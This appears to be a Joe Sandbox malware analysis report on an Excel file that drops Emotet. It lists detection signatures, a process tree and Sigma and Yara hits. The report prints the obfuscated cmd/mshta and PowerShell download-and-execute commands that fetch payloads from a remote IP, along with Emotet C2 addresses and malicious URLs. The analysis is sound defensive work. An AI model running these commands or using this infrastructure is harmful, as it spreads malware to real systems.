Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
364453688149503140239183.xls

Overview

General Information

Sample Name:364453688149503140239183.xls
Analysis ID:562430
MD5:4097bbda61bfb39067eab29fb342e34e
SHA1:ca13a07a1eb59e7b30f217239a0db63235354c49
SHA256:4d876f4afaf9df30d8b9ecaeddd86defa6dedd94dcaa933d67fe578b9cabdc18
Tags:SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Obfuscated command line found
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2232 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 1760 cmdline: CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • mshta.exe (PID: 2840 cmdline: mshta http://91.240.118.168/vvv/ppp/fe.html MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 3004 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • cmd.exe (PID: 2852 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • rundll32.exe (PID: 1180 cmdline: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2656 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 1532 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",OOkfVaPZ MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2672 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2916 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",xvIpPUnGjiWnFD MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 1200 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 2424 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",mYtMYmZ MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 2144 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
364453688149503140239183.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x96a2:$s1: Excel
  • 0xa705:$s1: Excel
  • 0x32a3:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
364453688149503140239183.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\364453688149503140239183.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
    • 0x0:$header_docf: D0 CF 11 E0
    • 0x96a2:$s1: Excel
    • 0xa705:$s1: Excel
    • 0x32a3:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
    C:\Users\user\Desktop\364453688149503140239183.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security
      C:\ProgramData\QWER.dllJoeSecurity_Emotet_1Yara detected EmotetJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        0000000F.00000002.616456228.00000000001C0000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          0000000A.00000002.512416856.0000000002F40000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            00000011.00000002.683540331.0000000010001000.00000020.00000001.01000000.0000000E.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              0000000F.00000002.617069039.00000000008F1000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                0000000C.00000002.564980270.00000000030B1000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  Click to see the 71 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  12.2.rundll32.exe.2a0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    10.2.rundll32.exe.170000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      11.2.rundll32.exe.200000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                        17.2.rundll32.exe.2e90000.16.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                          12.2.rundll32.exe.2850000.9.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                            Click to see the 105 entries

                            Sigma Overview

                            System Summary

                            barindex
                            Sigma detected: Windows Shell File Write to Suspicious Folder
                            Source: File createdAuthor: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 2840, TargetFilename: C:\Users\user\AppData\Local
                            Sigma detected: MSHTA Spawning Windows Shell
                            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/vvv/ppp/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2840, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3004
                            Sigma detected: Suspicious MSHTA Process Patterns
                            Source: Process startedAuthor: Florian Roth: Data: Command: mshta http://91.240.118.168/vvv/ppp/fe.html, CommandLine: mshta http://91.240.118.168/vvv/ppp/fe.html, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1760, ProcessCommandLine: mshta http://91.240.118.168/vvv/ppp/fe.html, ProcessId: 2840
                            Sigma detected: Microsoft Office Product Spawning Windows Shell
                            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l, CommandLine: CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2232, ProcessCommandLine: CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l, ProcessId: 1760
                            Sigma detected: Suspicious PowerShell Command Line
                            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/vvv/ppp/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2840, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3004
                            Sigma detected: Mshta Spawning Windows Shell
                            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/vvv/ppp/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2840, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3004
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/vvv/ppp/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2840, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3004

                            Jbx Signature Overview

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus detection for URL or domain
                            Source: http://91.240.118.168/vvv/ppp/fe.htmlWinSta0Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/vvv/ppp/feAvira URL Cloud: Label: malware
                            Source: http://cmit.valestudios.com/wp-admin/RueGJ41A/Avira URL Cloud: Label: malware
                            Source: http://curvygirlsboutique.com/jfertl/Ge49zcIzb8KWwXFFk/Avira URL Cloud: Label: phishing
                            Source: http://91.240.118.168/vvv/ppp/fe.htmlv1.0Avira URL Cloud: Label: malware
                            Source: http://bawelnianka.cfolks.pl/wp-content/Ttv/Avira URL Cloud: Label: phishing
                            Source: http://ayoobeducationaltrust.inAvira URL Cloud: Label: phishing
                            Source: http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/vvv/ppp/fe.pngPE3Avira URL Cloud: Label: malware
                            Source: http://cmit.valestudios.com/wp-aAvira URL Cloud: Label: malware
                            Source: http://thesocialagent.net/b/MO5AKqJ9Ty9lE/PE3Avira URL Cloud: Label: malware
                            Source: http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/vvv/ppp/fe.htmlmshtaAvira URL Cloud: Label: malware
                            Source: http://test.valestudios.com/wp-cAvira URL Cloud: Label: malware
                            Source: http://crm.compracasaenhouston.com/hs4d8a/c0s13I/PE3Avira URL Cloud: Label: phishing
                            Source: http://thesocialagent.net/b/MO5AKqJ9Ty9lE/Avira URL Cloud: Label: malware
                            Source: http://sellin.app/wp-admin/S2cDPYXNKEnT/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/vvv/ppp/fe.pngAvira URL Cloud: Label: malware
                            Source: http://test.dreamcityorlando.comAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168/vvv/ppp/fe.htmlC:Avira URL Cloud: Label: malware
                            Source: http://curvygirlsboutique.com/jfAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168/vvv/ppp/fe.html3Avira URL Cloud: Label: malware
